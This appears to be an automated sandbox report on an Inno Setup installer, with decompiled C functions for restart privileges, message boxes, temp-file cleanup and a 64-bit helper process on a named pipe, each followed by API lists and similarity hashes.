                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                    • API String ID: 1930782624-3908791685
                                                                    • Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                                    • Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
                                                                    • Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                                    • Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060F6D8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E0060F6D8() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E00429D18() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}







                                                                    0x0060f6e3
                                                                    0x0060f740
                                                                    0x0060f744
                                                                    0x0060f74c
                                                                    0x00000000
                                                                    0x0060f74e
                                                                    0x0060f6f5
                                                                    0x0060f707
                                                                    0x0060f70c
                                                                    0x0060f714
                                                                    0x0060f72e
                                                                    0x0060f73a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0060f73c
                                                                    0x00000000

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0060F707
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F72E
                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F733
                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 0060F744
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 107509674-3733053543
                                                                    • Opcode ID: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
                                                                    • Instruction ID: 06ed2f01938c74524bf5f5b14376f39d724559be6214a1270456cb597724f4e2
                                                                    • Opcode Fuzzy Hash: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
                                                                    • Instruction Fuzzy Hash: 8EF090306E430276E624AF719C47FEB218D9B40B09F50092DF644D61C1DBA9E589826B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006A68B0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			E006A68B0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, short* _a8, intOrPtr _a12, void* _a16, char _a20, intOrPtr _a24, intOrPtr* _a32, intOrPtr _a36, intOrPtr* _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				char _v5;
				intOrPtr _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v60;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed int _t77;
				signed int _t78;
				intOrPtr* _t79;
				signed int _t82;
				signed int _t83;
				short* _t87;
				intOrPtr _t106;
				intOrPtr _t123;
				void* _t125;
				char _t126;
				intOrPtr* _t127;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr* _t148;
				void* _t150;
				void* _t151;
				intOrPtr _t152;
				intOrPtr _t164;

				_t150 = _t151;
				_t152 = _t151 + 0xffffff8c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t147 = __ecx;
				_t123 = __edx;
				_t145 = __eax;
				_push(_t150);
				_push(0x6a6acd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152;
				if( *0x6d648c == 0) {
					_v5 = 0;
					__eflags = 0;
					_pop(_t136);
					 *[fs:eax] = _t136;
					_push(E006A6AD4);
					return 0;
				} else {
					E00407760( &_v120, 0x60);
					_v120 = 0x60;
					if(_a20 != 0) {
						_v108 = _v108 | 0x00002000;
					}
					_v112 =  *0x6d2634;
					_t70 =  *0x6cdec4; // 0x6d579c
					if(IsIconic( *( *_t70 + 0x188)) == 0) {
						_t74 =  *0x6cdec4; // 0x6d579c
						_t77 = GetWindowLongW( *( *_t74 + 0x188), 0xfffffff0);
						__eflags = _t77 & 0x10000000;
						_t12 = (_t77 & 0x10000000) == 0;
						__eflags = _t12;
						_t78 = _t77 & 0xffffff00 | _t12;
					} else {
						_t78 = 1;
					}
					if(_t78 == 0) {
						_t79 =  *0x6cdec4; // 0x6d579c
						_t82 = GetWindowLongW( *( *_t79 + 0x188), 0xffffffec);
						__eflags = _t82 & 0x00000080;
						_t17 = (_t82 & 0x00000080) != 0;
						__eflags = _t17;
						_t83 = _t82 & 0xffffff00 | _t17;
					} else {
						_t83 = 1;
					}
					if(_t83 == 0) {
						_v116 = _t145;
					} else {
						_v116 = 0;
					}
					_v104 = _a44;
					_v100 = _a52;
					_v96 = _a48;
					_v92 = _t123;
					_v88 = _t147;
					_t87 = _a8;
					if(_t87 != 0 &&  *_t87 != 0) {
						_v60 = _a8;
					}
					if(_a24 != 0) {
						_v36 = 0x6a6888;
						_v32 = _a24;
					}
					_v12 = 0;
					_push(_t150);
					_push(0x6a6ab4);
					_push( *[fs:edx]);
					 *[fs:edx] = _t152;
					_t125 = _a36 + 1;
					if(_t125 != 0) {
						_t106 =  *0x54808c; // 0x5480e4
						_v12 = E00466A64(0, 1, _t145, _t106);
						_v108 = _v108 | 0x00000010;
						_t125 = _t125 - 1;
						if(_t125 >= 0) {
							_t126 = _t125 + 1;
							_t164 = _t126;
							_v24 = _t126;
							_t127 = _a40;
							_t148 = _a32;
							do {
								_t145 = E0054BA48(_v12);
								E0054B708(_t145,  *_t127, _t164);
								 *((intOrPtr*)(_t145 + 0x18)) =  *_t148;
								_t148 = _t148 + 4;
								_t127 = _t127 + 4;
								_t45 =  &_v24;
								 *_t45 = _v24 - 1;
							} while ( *_t45 != 0);
						}
						_v80 = E0054BA54(_v12);
						_v84 =  *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)) + 8));
					}
					E005C9060();
					_v16 = GetActiveWindow();
					_v20 = E005ABB4C(0, _t125, _t145, _t147);
					 *[fs:eax] = _t152;
					_v5 =  *0x6d648c( &_v120, _a12, 0, _a4,  *[fs:eax], 0x6a6a97, _t150) == 0;
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(E006A6A9E);
					E005ABC0C(_v20);
					SetActiveWindow(_v16);
					return E005C9060();
				}
			}












































                                                                    0x006a68b1
                                                                    0x006a68b3
                                                                    0x006a68b6
                                                                    0x006a68b7
                                                                    0x006a68b8
                                                                    0x006a68b9
                                                                    0x006a68bb
                                                                    0x006a68bd
                                                                    0x006a68c1
                                                                    0x006a68c2
                                                                    0x006a68c7
                                                                    0x006a68ca
                                                                    0x006a68d4
                                                                    0x006a6abb
                                                                    0x006a6abf
                                                                    0x006a6ac1
                                                                    0x006a6ac4
                                                                    0x006a6ac7
                                                                    0x006a6acc
                                                                    0x006a68da
                                                                    0x006a68e4
                                                                    0x006a68e9
                                                                    0x006a68f4
                                                                    0x006a68f6
                                                                    0x006a68f6
                                                                    0x006a6902
                                                                    0x006a6905
                                                                    0x006a691a
                                                                    0x006a6920
                                                                    0x006a6930
                                                                    0x006a6935
                                                                    0x006a693a
                                                                    0x006a693a
                                                                    0x006a693a
                                                                    0x006a691c
                                                                    0x006a691c
                                                                    0x006a691c
                                                                    0x006a693f
                                                                    0x006a6945
                                                                    0x006a6955
                                                                    0x006a695a
                                                                    0x006a695c
                                                                    0x006a695c
                                                                    0x006a695c
                                                                    0x006a6941
                                                                    0x006a6941
                                                                    0x006a6941
                                                                    0x006a6961
                                                                    0x006a696a
                                                                    0x006a6963
                                                                    0x006a6965
                                                                    0x006a6965
                                                                    0x006a6970
                                                                    0x006a6976
                                                                    0x006a697c
                                                                    0x006a697f
                                                                    0x006a6982
                                                                    0x006a6985
                                                                    0x006a698a
                                                                    0x006a6995
                                                                    0x006a6995
                                                                    0x006a699c
                                                                    0x006a699e
                                                                    0x006a69a8
                                                                    0x006a69a8
                                                                    0x006a69ad
                                                                    0x006a69b2
                                                                    0x006a69b3
                                                                    0x006a69b8
                                                                    0x006a69bb
                                                                    0x006a69c1
                                                                    0x006a69c4
                                                                    0x006a69c6
                                                                    0x006a69da
                                                                    0x006a69dd
                                                                    0x006a69e1
                                                                    0x006a69e4
                                                                    0x006a69e6
                                                                    0x006a69e6
                                                                    0x006a69e7
                                                                    0x006a69ea
                                                                    0x006a69ed
                                                                    0x006a69f0
                                                                    0x006a69f8
                                                                    0x006a69fe
                                                                    0x006a6a05
                                                                    0x006a6a08
                                                                    0x006a6a0b
                                                                    0x006a6a0e
                                                                    0x006a6a0e
                                                                    0x006a6a0e
                                                                    0x006a69f0
                                                                    0x006a6a1b
                                                                    0x006a6a27
                                                                    0x006a6a27
                                                                    0x006a6a2f
                                                                    0x006a6a39
                                                                    0x006a6a43
                                                                    0x006a6a51
                                                                    0x006a6a6a
                                                                    0x006a6a70
                                                                    0x006a6a73
                                                                    0x006a6a76
                                                                    0x006a6a7e
                                                                    0x006a6a87
                                                                    0x006a6a96
                                                                    0x006a6a96

                                                                    APIs
                                                                    • IsIconic.USER32(?), ref: 006A6913
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006A6930
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006A6955
                                                                      • Part of subcall function 005ABC0C: IsWindow.USER32(8B565300), ref: 005ABC1A
                                                                      • Part of subcall function 005ABC0C: EnableWindow.USER32(8B565300,000000FF), ref: 005ABC29
                                                                    • GetActiveWindow.USER32 ref: 006A6A34
                                                                    • SetActiveWindow.USER32(00000005,006A6A9E,006A6AB4,?,?,000000EC,?,000000F0,00000000,006A6ACD,?,00000000,?,00000000), ref: 006A6A87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$ActiveLong$EnableIconic
                                                                    • String ID: `
                                                                    • API String ID: 4222481217-2679148245
                                                                    • Opcode ID: cde2a6536f5044e3bc4238d2ffbe734793dbf8fec1bfd9d9ee3b4b44e3c8bba9
                                                                    • Instruction ID: 936cf99dd23b6ce25ef8ab77046748165037aff960be166beb91cb3f54ae6a19
                                                                    • Opcode Fuzzy Hash: cde2a6536f5044e3bc4238d2ffbe734793dbf8fec1bfd9d9ee3b4b44e3c8bba9
                                                                    • Instruction Fuzzy Hash: C3611875A002099FDB00EFA9C885A9EBBF6FB4A304F598469F914EB361D734AD41CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B8DE4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E006B8DE4(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				struct _WIN32_FIND_DATAW _v604;
				char _v608;
				char _v612;
				void* _t59;
				intOrPtr _t70;
				intOrPtr _t73;
				signed int _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t80 = _t81;
				_t82 = _t81 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v8 = 0;
				_t59 = __eax;
				_push(_t80);
				_push(0x6b8f21);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				E0040B4C8( &_v608, L"isRS-???.tmp", __eax);
				_v12 = FindFirstFileW(E0040B278(_v608),  &_v604);
				if(_v12 == 0xffffffff) {
					_pop(_t70);
					 *[fs:eax] = _t70;
					_push(E006B8F28);
					E0040A228( &_v612, 2);
					return E0040A1C8( &_v8);
				} else {
					_push(_t80);
					_push(0x6b8ef4);
					_push( *[fs:eax]);
					 *[fs:eax] = _t82;
					do {
						if(E004241A0( &(_v604.cFileName), 5, L"isRS-") == 0 && (_v604.dwFileAttributes & 0x00000010) == 0) {
							E0040B318( &_v612, 0x104,  &(_v604.cFileName));
							E0040B4C8( &_v8, _v612, _t59);
							_t77 = _v604.dwFileAttributes;
							if((_t77 & 0x00000001) != 0) {
								SetFileAttributesW(E0040B278(_v8), _t77 & 0xfffffffe);
							}
							E00423A20(_v8);
						}
					} while (FindNextFileW(_v12,  &_v604) != 0);
					_pop(_t73);
					 *[fs:eax] = _t73;
					_push(E006B8EFB);
					return FindClose(_v12);
				}
			}















                                                                    0x006b8de5
                                                                    0x006b8de7
                                                                    0x006b8df1
                                                                    0x006b8df7
                                                                    0x006b8dfd
                                                                    0x006b8e00
                                                                    0x006b8e04
                                                                    0x006b8e05
                                                                    0x006b8e0a
                                                                    0x006b8e0d
                                                                    0x006b8e24
                                                                    0x006b8e3a
                                                                    0x006b8e41
                                                                    0x006b8efd
                                                                    0x006b8f00
                                                                    0x006b8f03
                                                                    0x006b8f13
                                                                    0x006b8f20
                                                                    0x006b8e47
                                                                    0x006b8e49
                                                                    0x006b8e4a
                                                                    0x006b8e4f
                                                                    0x006b8e52
                                                                    0x006b8e55
                                                                    0x006b8e6c
                                                                    0x006b8e88
                                                                    0x006b8e98
                                                                    0x006b8e9d
                                                                    0x006b8ea9
                                                                    0x006b8eb8
                                                                    0x006b8eb8
                                                                    0x006b8ec0
                                                                    0x006b8ec0
                                                                    0x006b8ed5
                                                                    0x006b8edf
                                                                    0x006b8ee2
                                                                    0x006b8ee5
                                                                    0x006b8ef3
                                                                    0x006b8ef3

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A,?,00000000,00000000,00000000), ref: 006B8E35
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B8EB8
                                                                    • FindNextFileW.KERNEL32(000000FF,?,00000000,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8ED0
                                                                    • FindClose.KERNEL32(000000FF,006B8EFB,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8EEE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                                    • String ID: isRS-$isRS-???.tmp
                                                                    • API String ID: 134685335-3422211394
                                                                    • Opcode ID: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                                    • Instruction ID: d39c6702953267373b2098697dd7c4daff6c19a754f4e73b98016d5d2bb0ed42
                                                                    • Opcode Fuzzy Hash: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                                    • Instruction Fuzzy Hash: E6317670A006189FDB10DF65DC45ADEB7BEEB84304F5145FAE804A3291EB389E81CB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C90B4, Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 65%
                                                                    			E005C90B4(WCHAR* __eax, void* __ebx, signed int __ecx, WCHAR* __edx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				intOrPtr* _t28;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr* _t37;
				signed int _t41;
				intOrPtr* _t43;
				WCHAR* _t62;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				WCHAR* _t78;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t76 = __edi;
				_t80 = _t81;
				_t82 = _t81 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_v8 = __ecx;
				_t78 = __edx;
				_t62 = __eax;
				if( *0x6d5814 != 0) {
					_v8 = _v8 | 0x00180000;
				}
				E005C9060();
				_push(_t80);
				_push(0x5c91da);
				_push( *[fs:edx]);
				 *[fs:edx] = _t82;
				_t28 =  *0x6cdec4; // 0x6d579c
				if(IsIconic( *( *_t28 + 0x188)) == 0) {
					_t32 =  *0x6cdec4; // 0x6d579c
					_t36 = GetWindowLongW( *( *_t32 + 0x188), 0xfffffff0) & 0xffffff00 | (_t35 & 0x10000000) == 0x00000000;
				} else {
					_t36 = 1;
				}
				if(_t36 == 0) {
					_t37 =  *0x6cdec4; // 0x6d579c
					_t41 = GetWindowLongW( *( *_t37 + 0x188), 0xffffffec) & 0xffffff00 | (_t40 & 0x00000080) != 0x00000000;
				} else {
					_t41 = 1;
				}
				if(_t41 == 0) {
					_t43 =  *0x6cdec4; // 0x6d579c
					_v12 = L005B8BCC( *_t43, _t62, _t78, _t62, _t76, _t78, _v8);
					_pop(_t73);
					 *[fs:eax] = _t73;
					_push(E005C91E1);
					return E005C9060();
				} else {
					_v16 = GetActiveWindow();
					_v20 = E005ABB4C(0, _t62, _t76, _t78);
					_push(_t80);
					_push(0x5c919d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t82;
					_v12 = MessageBoxW(0, _t62, _t78, _v8 | 0x00002000);
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(E005C91A4);
					E005ABC0C(_v20);
					return SetActiveWindow(_v16);
				}
			}





















                                                                    0x005c90b4
                                                                    0x005c90b5
                                                                    0x005c90b7
                                                                    0x005c90ba
                                                                    0x005c90bb
                                                                    0x005c90bc
                                                                    0x005c90bf
                                                                    0x005c90c1
                                                                    0x005c90ca
                                                                    0x005c90cc
                                                                    0x005c90cc
                                                                    0x005c90d8
                                                                    0x005c90df
                                                                    0x005c90e0
                                                                    0x005c90e5
                                                                    0x005c90e8
                                                                    0x005c90eb
                                                                    0x005c9100
                                                                    0x005c9106
                                                                    0x005c9120
                                                                    0x005c9102
                                                                    0x005c9102
                                                                    0x005c9102
                                                                    0x005c9125
                                                                    0x005c912b
                                                                    0x005c9142
                                                                    0x005c9127
                                                                    0x005c9127
                                                                    0x005c9127
                                                                    0x005c9147
                                                                    0x005c91af
                                                                    0x005c91bf
                                                                    0x005c91c4
                                                                    0x005c91c7
                                                                    0x005c91ca
                                                                    0x005c91d9
                                                                    0x005c9149
                                                                    0x005c914e
                                                                    0x005c9158
                                                                    0x005c915d
                                                                    0x005c915e
                                                                    0x005c9163
                                                                    0x005c9166
                                                                    0x005c917b
                                                                    0x005c9180
                                                                    0x005c9183
                                                                    0x005c9186
                                                                    0x005c918e
                                                                    0x005c919c
                                                                    0x005c919c

                                                                    APIs
                                                                    • IsIconic.USER32(?), ref: 005C90F9
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 005C9116
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005C913B
                                                                    • GetActiveWindow.USER32 ref: 005C9149
                                                                    • MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C9176
                                                                    • SetActiveWindow.USER32(00000000,005C91A4,?,000000EC,?,000000F0,?,00000000,005C91DA,?,?,00000000), ref: 005C9197
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$ActiveLong$IconicMessage
                                                                    • String ID:
                                                                    • API String ID: 1633107849-0
                                                                    • Opcode ID: 6ccadbc60b25befb027f438fb9d8ea6f9f99e08362a6b6c28a86a9c04d8ecebe
                                                                    • Instruction ID: 0eaebbc0e28104152e09dfddf635ce6469108de93c670a6b66e2a7222b47ea08
                                                                    • Opcode Fuzzy Hash: 6ccadbc60b25befb027f438fb9d8ea6f9f99e08362a6b6c28a86a9c04d8ecebe
                                                                    • Instruction Fuzzy Hash: 4F319375A04605AFDB00EFA9DD4AF9A7BF9FB89350B1544A9F400D73A1DB34AD00DB14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00625754, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 187pipeprocessfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 82%
                                                                    			E00625754(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v12;
				char _v16;
				void* _v20;
				void* _v24;
				long _v28;
				struct _STARTUPINFOW _v96;
				struct _PROCESS_INFORMATION _v112;
				char _v116;
				long _v120;
				char _v124;
				long _v128;
				char _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				void* _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char* _t62;
				WCHAR* _t91;
				WCHAR* _t97;
				intOrPtr _t98;
				void* _t127;
				intOrPtr _t139;
				struct _FILETIME* _t141;
				void* _t145;
				void* _t146;
				intOrPtr _t147;

				_t145 = _t146;
				_t147 = _t146 + 0xffffff4c;
				_v156 = 0;
				_v160 = 0;
				_v16 = 0;
				_t127 = __eax;
				_t141 =  &_v12;
				_push(_t145);
				_push(0x625a4f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				E00616130(L"Starting 64-bit helper process.", __eax, _t141, 0x6d636c);
				_t62 =  *0x6cda20; // 0x6d67dd
				if( *_t62 == 0) {
					E0060CD28(L"Cannot utilize 64-bit features on this version of Windows", _t127);
				}
				if( *0x6d6368 == 0) {
					E0060CD28(L"64-bit helper EXE wasn\'t extracted", _t127);
				}
				while(1) {
					 *0x6d636c =  *0x6d636c + 1;
					 *((intOrPtr*)(_t127 + 0x14)) = GetTickCount();
					if(QueryPerformanceCounter(_t141) == 0) {
						GetSystemTimeAsFileTime(_t141);
					}
					_v152 = GetCurrentProcessId();
					_v148 = 0;
					_v144 =  *0x6d636c;
					_v140 = 0;
					_v136 =  *((intOrPtr*)(_t127 + 0x14));
					_v132 = 0;
					_v128 = _t141->dwHighDateTime;
					_v124 = 0;
					_v120 = _t141->dwLowDateTime;
					_v116 = 0;
					E004244F8(L"\\\\.\\pipe\\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x", 4,  &_v152,  &_v16);
					_v20 = CreateNamedPipeW(E0040B278(_v16), 0x40080003, 6, 1, 0x2000, 0x2000, 0, 0);
					if(_v20 != 0xffffffff) {
						break;
					}
					if(GetLastError() != 0xe7) {
						E0060CE84(L"CreateNamedPipe");
					}
				}
				_push(_t145);
				_push(0x625a0b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				_v24 = CreateFileW(E0040B278(_v16), 0xc0000000, 0, 0x6cd098, 3, 0, 0);
				if(_v24 == 0xffffffff) {
					E0060CE84(L"CreateFile");
				}
				_push(_t145);
				_push(0x6259fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				_v28 = 2;
				if(SetNamedPipeHandleState(_v24,  &_v28, 0, 0) == 0) {
					E0060CE84(L"SetNamedPipeHandleState");
				}
				E00407760( &_v96, 0x44);
				_v96.cb = 0x44;
				E005C745C( &_v156);
				_t91 = E0040B278(_v156);
				_v176 = 0x69;
				_v172 = 0;
				_v168 = _v24;
				_v164 = 0;
				E004244F8(L"helper %d 0x%x", 1,  &_v176,  &_v160);
				_t97 = E0040B278(_v160);
				_t98 =  *0x6d6368; // 0x0
				if(CreateProcessW(E0040B278(_t98), _t97, 0, 0, 0xffffffff, 0xc000000, 0, _t91,  &_v96,  &_v112) == 0) {
					E0060CE84(L"CreateProcess");
				}
				 *((char*)(_t127 + 4)) = 1;
				 *((char*)(_t127 + 5)) = 0;
				 *(_t127 + 8) = _v112.hProcess;
				 *((intOrPtr*)(_t127 + 0x10)) = _v112.dwProcessId;
				 *((intOrPtr*)(_t127 + 0xc)) = _v20;
				_v20 = 0;
				CloseHandle(_v112.hThread);
				_v184 =  *((intOrPtr*)(_t127 + 0x10));
				_v180 = 0;
				E006163B4(L"Helper process PID: %u", _t127, 0,  &_v184, _t141, 0x6d636c);
				_pop(_t139);
				 *[fs:eax] = _t139;
				_push(E00625A01);
				return CloseHandle(_v24);
